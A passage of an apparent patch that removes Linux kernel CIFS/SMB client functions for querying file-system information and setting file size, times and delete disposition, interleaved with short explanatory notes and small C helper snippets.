+-			    (FILE_SYSTEM_INFO
+-			     *) (((char *) &pSMBr->hdr.Protocol) +
+-				 data_offset);
+-			FSData->f_bsize =
+-			    le32_to_cpu(response_data->BytesPerSector) *
+-			    le32_to_cpu(response_data->
+-					SectorsPerAllocationUnit);
+-			/*
+-			 * much prefer larger, but if the server doesn't
+-			 * report a valid size then 4K is a reasonable minimum
+-			 */
+-			if (FSData->f_bsize < 512)
+-				FSData->f_bsize = 4096;
+-
+-			FSData->f_blocks =
+-			    le64_to_cpu(response_data->TotalAllocationUnits);
+-			FSData->f_bfree = FSData->f_bavail =
+-			    le64_to_cpu(response_data->FreeAllocationUnits);
+-			cifs_dbg(FYI, "Blocks: %lld  Free: %lld Block size %ld\n",
+-				 (unsigned long long)FSData->f_blocks,
+-				 (unsigned long long)FSData->f_bfree,
+-				 FSData->f_bsize);
+-		}
+-	}
+-	cifs_buf_release(pSMB);
+-
+-	if (rc == -EAGAIN)
+-		goto QFSInfoRetry;
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBQFSAttributeInfo(const unsigned int xid, struct cifs_tcon *tcon)
+-{
+-/* level 0x105  SMB_QUERY_FILE_SYSTEM_INFO */
+-	TRANSACTION2_QFSI_REQ *pSMB = NULL;
+-	TRANSACTION2_QFSI_RSP *pSMBr = NULL;
+-	FILE_SYSTEM_ATTRIBUTE_INFO *response_data;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	__u16 params, byte_count;
+-
+-	cifs_dbg(FYI, "In QFSAttributeInfo\n");
+-QFSAttributeRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	params = 2;	/* level */
+-	pSMB->TotalDataCount = 0;
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find exact max SMB PDU from sess structure BB */
+-	pSMB->MaxDataCount = cpu_to_le16(1000);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	byte_count = params + 1 /* pad */ ;
+-	pSMB->TotalParameterCount = cpu_to_le16(params);
+-	pSMB->ParameterCount = pSMB->TotalParameterCount;
+-	pSMB->ParameterOffset = cpu_to_le16(offsetof(
+-		struct smb_com_transaction2_qfsi_req, InformationLevel) - 4);
+-	pSMB->DataCount = 0;
+-	pSMB->DataOffset = 0;
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_FS_INFORMATION);
+-	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FS_ATTRIBUTE_INFO);
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(VFS, "Send error in QFSAttributeInfo = %d\n", rc);
+-	} else {		/* decode response */
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-
+-		if (rc || get_bcc(&pSMBr->hdr) < 13) {
+-			/* BB also check if enough bytes returned */
+-			rc = -EIO;	/* bad smb */
+-		} else {
+-			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
+-			response_data =
+-			    (FILE_SYSTEM_ATTRIBUTE_INFO
+-			     *) (((char *) &pSMBr->hdr.Protocol) +
+-				 data_offset);
+-			memcpy(&tcon->fsAttrInfo, response_data,
+-			       sizeof(FILE_SYSTEM_ATTRIBUTE_INFO));
+-		}
+-	}
+-	cifs_buf_release(pSMB);
+-
+-	if (rc == -EAGAIN)
+-		goto QFSAttributeRetry;
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBQFSDeviceInfo(const unsigned int xid, struct cifs_tcon *tcon)
+-{
+-/* level 0x104 SMB_QUERY_FILE_SYSTEM_INFO */
+-	TRANSACTION2_QFSI_REQ *pSMB = NULL;
+-	TRANSACTION2_QFSI_RSP *pSMBr = NULL;
+-	FILE_SYSTEM_DEVICE_INFO *response_data;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	__u16 params, byte_count;
+-
+-	cifs_dbg(FYI, "In QFSDeviceInfo\n");
+-QFSDeviceRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	params = 2;	/* level */
+-	pSMB->TotalDataCount = 0;
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find exact max SMB PDU from sess structure BB */
+-	pSMB->MaxDataCount = cpu_to_le16(1000);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	byte_count = params + 1 /* pad */ ;
+-	pSMB->TotalParameterCount = cpu_to_le16(params);
+-	pSMB->ParameterCount = pSMB->TotalParameterCount;
+-	pSMB->ParameterOffset = cpu_to_le16(offsetof(
+-		struct smb_com_transaction2_qfsi_req, InformationLevel) - 4);
+-
+-	pSMB->DataCount = 0;
+-	pSMB->DataOffset = 0;
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_FS_INFORMATION);
+-	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_FS_DEVICE_INFO);
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in QFSDeviceInfo = %d\n", rc);
+-	} else {		/* decode response */
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-
+-		if (rc || get_bcc(&pSMBr->hdr) <
+-			  sizeof(FILE_SYSTEM_DEVICE_INFO))
+-			rc = -EIO;	/* bad smb */
+-		else {
+-			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
+-			response_data =
+-			    (FILE_SYSTEM_DEVICE_INFO *)
+-				(((char *) &pSMBr->hdr.Protocol) +
+-				 data_offset);
+-			memcpy(&tcon->fsDevInfo, response_data,
+-			       sizeof(FILE_SYSTEM_DEVICE_INFO));
+-		}
+-	}
+-	cifs_buf_release(pSMB);
+-
+-	if (rc == -EAGAIN)
+-		goto QFSDeviceRetry;
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBQFSUnixInfo(const unsigned int xid, struct cifs_tcon *tcon)
+-{
+-/* level 0x200  SMB_QUERY_CIFS_UNIX_INFO */
+-	TRANSACTION2_QFSI_REQ *pSMB = NULL;
+-	TRANSACTION2_QFSI_RSP *pSMBr = NULL;
+-	FILE_SYSTEM_UNIX_INFO *response_data;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	__u16 params, byte_count;
+-
+-	cifs_dbg(FYI, "In QFSUnixInfo\n");
+-QFSUnixRetry:
+-	rc = smb_init_no_reconnect(SMB_COM_TRANSACTION2, 15, tcon,
+-				   (void **) &pSMB, (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	params = 2;	/* level */
+-	pSMB->TotalDataCount = 0;
+-	pSMB->DataCount = 0;
+-	pSMB->DataOffset = 0;
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find exact max SMB PDU from sess structure BB */
+-	pSMB->MaxDataCount = cpu_to_le16(100);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	byte_count = params + 1 /* pad */ ;
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->ParameterOffset = cpu_to_le16(offsetof(struct
+-			smb_com_transaction2_qfsi_req, InformationLevel) - 4);
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_FS_INFORMATION);
+-	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_CIFS_UNIX_INFO);
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(VFS, "Send error in QFSUnixInfo = %d\n", rc);
+-	} else {		/* decode response */
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-
+-		if (rc || get_bcc(&pSMBr->hdr) < 13) {
+-			rc = -EIO;	/* bad smb */
+-		} else {
+-			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
+-			response_data =
+-			    (FILE_SYSTEM_UNIX_INFO
+-			     *) (((char *) &pSMBr->hdr.Protocol) +
+-				 data_offset);
+-			memcpy(&tcon->fsUnixInfo, response_data,
+-			       sizeof(FILE_SYSTEM_UNIX_INFO));
+-		}
+-	}
+-	cifs_buf_release(pSMB);
+-
+-	if (rc == -EAGAIN)
+-		goto QFSUnixRetry;
+-
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBSetFSUnixInfo(const unsigned int xid, struct cifs_tcon *tcon, __u64 cap)
+-{
+-/* level 0x200  SMB_SET_CIFS_UNIX_INFO */
+-	TRANSACTION2_SETFSI_REQ *pSMB = NULL;
+-	TRANSACTION2_SETFSI_RSP *pSMBr = NULL;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	__u16 params, param_offset, offset, byte_count;
+-
+-	cifs_dbg(FYI, "In SETFSUnixInfo\n");
+-SETFSUnixRetry:
+-	/* BB switch to small buf init to save memory */
+-	rc = smb_init_no_reconnect(SMB_COM_TRANSACTION2, 15, tcon,
+-					(void **) &pSMB, (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	params = 4;	/* 2 bytes zero followed by info level. */
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	param_offset = offsetof(struct smb_com_transaction2_setfsi_req, FileNum)
+-				- 4;
+-	offset = param_offset + params;
+-
+-	pSMB->MaxParameterCount = cpu_to_le16(4);
+-	/* BB find exact max SMB PDU from sess structure BB */
+-	pSMB->MaxDataCount = cpu_to_le16(100);
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_FS_INFORMATION);
+-	byte_count = 1 /* pad */ + params + 12;
+-
+-	pSMB->DataCount = cpu_to_le16(12);
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalDataCount = pSMB->DataCount;
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->ParameterOffset = cpu_to_le16(param_offset);
+-	pSMB->DataOffset = cpu_to_le16(offset);
+-
+-	/* Params. */
+-	pSMB->FileNum = 0;
+-	pSMB->InformationLevel = cpu_to_le16(SMB_SET_CIFS_UNIX_INFO);
+-
+-	/* Data. */
+-	pSMB->ClientUnixMajor = cpu_to_le16(CIFS_UNIX_MAJOR_VERSION);
+-	pSMB->ClientUnixMinor = cpu_to_le16(CIFS_UNIX_MINOR_VERSION);
+-	pSMB->ClientUnixCap = cpu_to_le64(cap);
+-
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(VFS, "Send error in SETFSUnixInfo = %d\n", rc);
+-	} else {		/* decode response */
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-		if (rc)
+-			rc = -EIO;	/* bad smb */
+-	}
+-	cifs_buf_release(pSMB);
+-
+-	if (rc == -EAGAIN)
+-		goto SETFSUnixRetry;
+-
+-	return rc;
+-}
+-
+-
+-
+-int
+-CIFSSMBQFSPosixInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-		   struct kstatfs *FSData)
+-{
+-/* level 0x201  SMB_QUERY_CIFS_POSIX_INFO */
+-	TRANSACTION2_QFSI_REQ *pSMB = NULL;
+-	TRANSACTION2_QFSI_RSP *pSMBr = NULL;
+-	FILE_SYSTEM_POSIX_INFO *response_data;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	__u16 params, byte_count;
+-
+-	cifs_dbg(FYI, "In QFSPosixInfo\n");
+-QFSPosixRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	params = 2;	/* level */
+-	pSMB->TotalDataCount = 0;
+-	pSMB->DataCount = 0;
+-	pSMB->DataOffset = 0;
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find exact max SMB PDU from sess structure BB */
+-	pSMB->MaxDataCount = cpu_to_le16(100);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	byte_count = params + 1 /* pad */ ;
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->ParameterOffset = cpu_to_le16(offsetof(struct
+-			smb_com_transaction2_qfsi_req, InformationLevel) - 4);
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_QUERY_FS_INFORMATION);
+-	pSMB->InformationLevel = cpu_to_le16(SMB_QUERY_POSIX_FS_INFO);
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in QFSPosixInfo = %d\n", rc);
+-	} else {		/* decode response */
+-		rc = validate_t2((struct smb_t2_rsp *)pSMBr);
+-
+-		if (rc || get_bcc(&pSMBr->hdr) < 13) {
+-			rc = -EIO;	/* bad smb */
+-		} else {
+-			__u16 data_offset = le16_to_cpu(pSMBr->t2.DataOffset);
+-			response_data =
+-			    (FILE_SYSTEM_POSIX_INFO
+-			     *) (((char *) &pSMBr->hdr.Protocol) +
+-				 data_offset);
+-			FSData->f_bsize =
+-					le32_to_cpu(response_data->BlockSize);
+-			/*
+-			 * much prefer larger, but if the server doesn't
+-			 * report a valid size then 4K is a reasonable minimum
+-			 */
+-			if (FSData->f_bsize < 512)
+-				FSData->f_bsize = 4096;
+-
+-			FSData->f_blocks =
+-					le64_to_cpu(response_data->TotalBlocks);
+-			FSData->f_bfree =
+-			    le64_to_cpu(response_data->BlocksAvail);
+-			if (response_data->UserBlocksAvail == cpu_to_le64(-1)) {
+-				FSData->f_bavail = FSData->f_bfree;
+-			} else {
+-				FSData->f_bavail =
+-				    le64_to_cpu(response_data->UserBlocksAvail);
+-			}
+-			if (response_data->TotalFileNodes != cpu_to_le64(-1))
+-				FSData->f_files =
+-				     le64_to_cpu(response_data->TotalFileNodes);
+-			if (response_data->FreeFileNodes != cpu_to_le64(-1))
+-				FSData->f_ffree =
+-				      le64_to_cpu(response_data->FreeFileNodes);
+-		}
+-	}
+-	cifs_buf_release(pSMB);
+-
+-	if (rc == -EAGAIN)
+-		goto QFSPosixRetry;
+-
+-	return rc;
+-}
+-
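
CIFSSMBQFSPosixInfo() above treats an all-ones wire value as "not supplied
by the server" and leaves the corresponding kstatfs field untouched. The
sentinel test in isolation:

#include <stdint.h>

/* cpu_to_le64(-1) is all-ones regardless of byte order */
static int posix_fs_field_supplied(uint64_t wire_value)
{
	return wire_value != UINT64_MAX;
}
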
+-
+-/*
+- * We cannot use the write-of-zero-bytes trick to set the file size, due to
+- * the need for large file support. Also note that this SetPathInfo is
+- * preferred to the SetFileInfo based method in the next routine, which is
+- * only needed to work around a sharing violation bug in Samba that this
+- * routine can run into.
+- */
+-int
+-CIFSSMBSetEOF(const unsigned int xid, struct cifs_tcon *tcon,
+-	      const char *file_name, __u64 size, struct cifs_sb_info *cifs_sb,
+-	      bool set_allocation)
+-{
+-	struct smb_com_transaction2_spi_req *pSMB = NULL;
+-	struct smb_com_transaction2_spi_rsp *pSMBr = NULL;
+-	struct file_end_of_file_info *parm_data;
+-	int name_len;
+-	int rc = 0;
+-	int bytes_returned = 0;
+-	int remap = cifs_remap(cifs_sb);
+-
+-	__u16 params, byte_count, data_count, param_offset, offset;
+-
+-	cifs_dbg(FYI, "In SetEOF\n");
+-SetEOFRetry:
+-	rc = smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB,
+-		      (void **) &pSMBr);
+-	if (rc)
+-		return rc;
+-
+-	if (pSMB->hdr.Flags2 & SMBFLG2_UNICODE) {
+-		name_len =
+-		    cifsConvertToUTF16((__le16 *) pSMB->FileName, file_name,
+-				       PATH_MAX, cifs_sb->local_nls, remap);
+-		name_len++;	/* trailing null */
+-		name_len *= 2;
+-	} else {
+-		name_len = copy_path_name(pSMB->FileName, file_name);
+-	}
+-	params = 6 + name_len;
+-	data_count = sizeof(struct file_end_of_file_info);
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	pSMB->MaxDataCount = cpu_to_le16(4100);
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	param_offset = offsetof(struct smb_com_transaction2_spi_req,
+-				InformationLevel) - 4;
+-	offset = param_offset + params;
+-	if (set_allocation) {
+-		if (tcon->ses->capabilities & CAP_INFOLEVEL_PASSTHRU)
+-			pSMB->InformationLevel =
+-				cpu_to_le16(SMB_SET_FILE_ALLOCATION_INFO2);
+-		else
+-			pSMB->InformationLevel =
+-				cpu_to_le16(SMB_SET_FILE_ALLOCATION_INFO);
+-	} else /* Set File Size */  {
+-	    if (tcon->ses->capabilities & CAP_INFOLEVEL_PASSTHRU)
+-		    pSMB->InformationLevel =
+-				cpu_to_le16(SMB_SET_FILE_END_OF_FILE_INFO2);
+-	    else
+-		    pSMB->InformationLevel =
+-				cpu_to_le16(SMB_SET_FILE_END_OF_FILE_INFO);
+-	}
+-
+-	parm_data =
+-	    (struct file_end_of_file_info *) (((char *) &pSMB->hdr.Protocol) +
+-				       offset);
+-	pSMB->ParameterOffset = cpu_to_le16(param_offset);
+-	pSMB->DataOffset = cpu_to_le16(offset);
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_PATH_INFORMATION);
+-	byte_count = 3 /* pad */  + params + data_count;
+-	pSMB->DataCount = cpu_to_le16(data_count);
+-	pSMB->TotalDataCount = pSMB->DataCount;
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	parm_data->FileSize = cpu_to_le64(size);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-	rc = SendReceive(xid, tcon->ses, (struct smb_hdr *) pSMB,
+-			 (struct smb_hdr *) pSMBr, &bytes_returned, 0);
+-	if (rc)
+-		cifs_dbg(FYI, "SetPathInfo (file size) returned %d\n", rc);
+-
+-	cifs_buf_release(pSMB);
+-
+-	if (rc == -EAGAIN)
+-		goto SetEOFRetry;
+-
+-	return rc;
+-}
+-
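
CIFSSMBSetEOF() above (and the handle-based variant that follows) picks the
information level the same way: the passthrough variants when the server
advertises CAP_INFOLEVEL_PASSTHRU, the plain ones otherwise, crossed with
whether allocation size or end-of-file is being set. Reduced to a small
helper (the enum constants stand in for the real SMB_SET_FILE_* levels):

enum eof_level { EOF_INFO, EOF_INFO2, ALLOC_INFO, ALLOC_INFO2 };

static enum eof_level pick_level(int passthru_capable, int set_allocation)
{
	if (set_allocation)
		return passthru_capable ? ALLOC_INFO2 : ALLOC_INFO;
	return passthru_capable ? EOF_INFO2 : EOF_INFO;
}
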
+-int
+-CIFSSMBSetFileSize(const unsigned int xid, struct cifs_tcon *tcon,
+-		   struct cifsFileInfo *cfile, __u64 size, bool set_allocation)
+-{
+-	struct smb_com_transaction2_sfi_req *pSMB  = NULL;
+-	struct file_end_of_file_info *parm_data;
+-	int rc = 0;
+-	__u16 params, param_offset, offset, byte_count, count;
+-
+-	cifs_dbg(FYI, "SetFileSize (via SetFileInfo) %lld\n",
+-		 (long long)size);
+-	rc = small_smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB);
+-
+-	if (rc)
+-		return rc;
+-
+-	pSMB->hdr.Pid = cpu_to_le16((__u16)cfile->pid);
+-	pSMB->hdr.PidHigh = cpu_to_le16((__u16)(cfile->pid >> 16));
+-
+-	params = 6;
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	param_offset = offsetof(struct smb_com_transaction2_sfi_req, Fid) - 4;
+-	offset = param_offset + params;
+-
+-	count = sizeof(struct file_end_of_file_info);
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find exact max SMB PDU from sess structure BB */
+-	pSMB->MaxDataCount = cpu_to_le16(1000);
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_FILE_INFORMATION);
+-	byte_count = 3 /* pad */  + params + count;
+-	pSMB->DataCount = cpu_to_le16(count);
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalDataCount = pSMB->DataCount;
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->ParameterOffset = cpu_to_le16(param_offset);
+-	/* SMB offsets are from the beginning of SMB which is 4 bytes in, after RFC1001 field */
+-	parm_data =
+-		(struct file_end_of_file_info *)(((char *)pSMB) + offset + 4);
+-	pSMB->DataOffset = cpu_to_le16(offset);
+-	parm_data->FileSize = cpu_to_le64(size);
+-	pSMB->Fid = cfile->fid.netfid;
+-	if (set_allocation) {
+-		if (tcon->ses->capabilities & CAP_INFOLEVEL_PASSTHRU)
+-			pSMB->InformationLevel =
+-				cpu_to_le16(SMB_SET_FILE_ALLOCATION_INFO2);
+-		else
+-			pSMB->InformationLevel =
+-				cpu_to_le16(SMB_SET_FILE_ALLOCATION_INFO);
+-	} else /* Set File Size */  {
+-	    if (tcon->ses->capabilities & CAP_INFOLEVEL_PASSTHRU)
+-		    pSMB->InformationLevel =
+-				cpu_to_le16(SMB_SET_FILE_END_OF_FILE_INFO2);
+-	    else
+-		    pSMB->InformationLevel =
+-				cpu_to_le16(SMB_SET_FILE_END_OF_FILE_INFO);
+-	}
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-	rc = SendReceiveNoRsp(xid, tcon->ses, (char *) pSMB, 0);
+-	cifs_small_buf_release(pSMB);
+-	if (rc) {
+-		cifs_dbg(FYI, "Send error in SetFileInfo (SetFileSize) = %d\n",
+-			 rc);
+-	}
+-
+-	/* Note: On -EAGAIN error only caller can retry on handle based calls
+-		since file handle passed in no longer valid */
+-
+-	return rc;
+-}
+-
+-/* Some legacy servers such as NT4 require that the file times be set on
+-   an open handle, rather than by pathname - this is awkward due to
+-   potential access conflicts on the open, but it is unavoidable for these
+-   old servers since the only other choice is to go from 100 nanosecond DCE
+-   time and resort to the original setpathinfo level which takes the ancient
+-   DOS time format with 2 second granularity */
+-int
+-CIFSSMBSetFileInfo(const unsigned int xid, struct cifs_tcon *tcon,
+-		    const FILE_BASIC_INFO *data, __u16 fid, __u32 pid_of_opener)
+-{
+-	struct smb_com_transaction2_sfi_req *pSMB  = NULL;
+-	char *data_offset;
+-	int rc = 0;
+-	__u16 params, param_offset, offset, byte_count, count;
+-
+-	cifs_dbg(FYI, "Set Times (via SetFileInfo)\n");
+-	rc = small_smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB);
+-
+-	if (rc)
+-		return rc;
+-
+-	pSMB->hdr.Pid = cpu_to_le16((__u16)pid_of_opener);
+-	pSMB->hdr.PidHigh = cpu_to_le16((__u16)(pid_of_opener >> 16));
+-
+-	params = 6;
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	param_offset = offsetof(struct smb_com_transaction2_sfi_req, Fid) - 4;
+-	offset = param_offset + params;
+-
+-	data_offset = (char *)pSMB +
+-			offsetof(struct smb_hdr, Protocol) + offset;
+-
+-	count = sizeof(FILE_BASIC_INFO);
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find max SMB PDU from sess */
+-	pSMB->MaxDataCount = cpu_to_le16(1000);
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_FILE_INFORMATION);
+-	byte_count = 3 /* pad */  + params + count;
+-	pSMB->DataCount = cpu_to_le16(count);
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalDataCount = pSMB->DataCount;
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->ParameterOffset = cpu_to_le16(param_offset);
+-	pSMB->DataOffset = cpu_to_le16(offset);
+-	pSMB->Fid = fid;
+-	if (tcon->ses->capabilities & CAP_INFOLEVEL_PASSTHRU)
+-		pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_BASIC_INFO2);
+-	else
+-		pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_BASIC_INFO);
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-	memcpy(data_offset, data, sizeof(FILE_BASIC_INFO));
+-	rc = SendReceiveNoRsp(xid, tcon->ses, (char *) pSMB, 0);
+-	cifs_small_buf_release(pSMB);
+-	if (rc)
+-		cifs_dbg(FYI, "Send error in Set Time (SetFileInfo) = %d\n",
+-			 rc);
+-
+-	/* Note: On -EAGAIN error only caller can retry on handle based calls
+-		since file handle passed in no longer valid */
+-
+-	return rc;
+-}
+-
+-int
+-CIFSSMBSetFileDisposition(const unsigned int xid, struct cifs_tcon *tcon,
+-			  bool delete_file, __u16 fid, __u32 pid_of_opener)
+-{
+-	struct smb_com_transaction2_sfi_req *pSMB  = NULL;
+-	char *data_offset;
+-	int rc = 0;
+-	__u16 params, param_offset, offset, byte_count, count;
+-
+-	cifs_dbg(FYI, "Set File Disposition (via SetFileInfo)\n");
+-	rc = small_smb_init(SMB_COM_TRANSACTION2, 15, tcon, (void **) &pSMB);
+-
+-	if (rc)
+-		return rc;
+-
+-	pSMB->hdr.Pid = cpu_to_le16((__u16)pid_of_opener);
+-	pSMB->hdr.PidHigh = cpu_to_le16((__u16)(pid_of_opener >> 16));
+-
+-	params = 6;
+-	pSMB->MaxSetupCount = 0;
+-	pSMB->Reserved = 0;
+-	pSMB->Flags = 0;
+-	pSMB->Timeout = 0;
+-	pSMB->Reserved2 = 0;
+-	param_offset = offsetof(struct smb_com_transaction2_sfi_req, Fid) - 4;
+-	offset = param_offset + params;
+-
+-	/* SMB offsets are from the beginning of SMB which is 4 bytes in, after RFC1001 field */
+-	data_offset = (char *)(pSMB) + offset + 4;
+-
+-	count = 1;
+-	pSMB->MaxParameterCount = cpu_to_le16(2);
+-	/* BB find max SMB PDU from sess */
+-	pSMB->MaxDataCount = cpu_to_le16(1000);
+-	pSMB->SetupCount = 1;
+-	pSMB->Reserved3 = 0;
+-	pSMB->SubCommand = cpu_to_le16(TRANS2_SET_FILE_INFORMATION);
+-	byte_count = 3 /* pad */  + params + count;
+-	pSMB->DataCount = cpu_to_le16(count);
+-	pSMB->ParameterCount = cpu_to_le16(params);
+-	pSMB->TotalDataCount = pSMB->DataCount;
+-	pSMB->TotalParameterCount = pSMB->ParameterCount;
+-	pSMB->ParameterOffset = cpu_to_le16(param_offset);
+-	pSMB->DataOffset = cpu_to_le16(offset);
+-	pSMB->Fid = fid;
+-	pSMB->InformationLevel = cpu_to_le16(SMB_SET_FILE_DISPOSITION_INFO);
+-	pSMB->Reserved4 = 0;
+-	inc_rfc1001_len(pSMB, byte_count);
+-	pSMB->ByteCount = cpu_to_le16(byte_count);
+-	*data_offset = delete_file ? 1 : 0;
+-	rc = SendReceiveNoRsp(xid, tcon->ses, (char *) pSMB, 0);
+-	cifs_small_buf_release(pSMB);
+-	if (rc)
+-		cifs_dbg(FYI, "Send error in SetFileDisposition = %d\n", rc);
+-
+-	return rc;
+-}
+-
+-static int
+-CIFSSMBSetPathInfoFB(const unsigned int xid, struct cifs_tcon *tcon,
+-		     const char *fileName, const FILE_BASIC_INFO *data,
+-		     const struct nls_table *nls_codepage,
+-		     struct cifs_sb_info *cifs_sb)
+-{
+-	int oplock = 0;
+-	struct cifs_open_parms oparms;
+-	struct cifs_fid fid;
+-	int rc;
+-
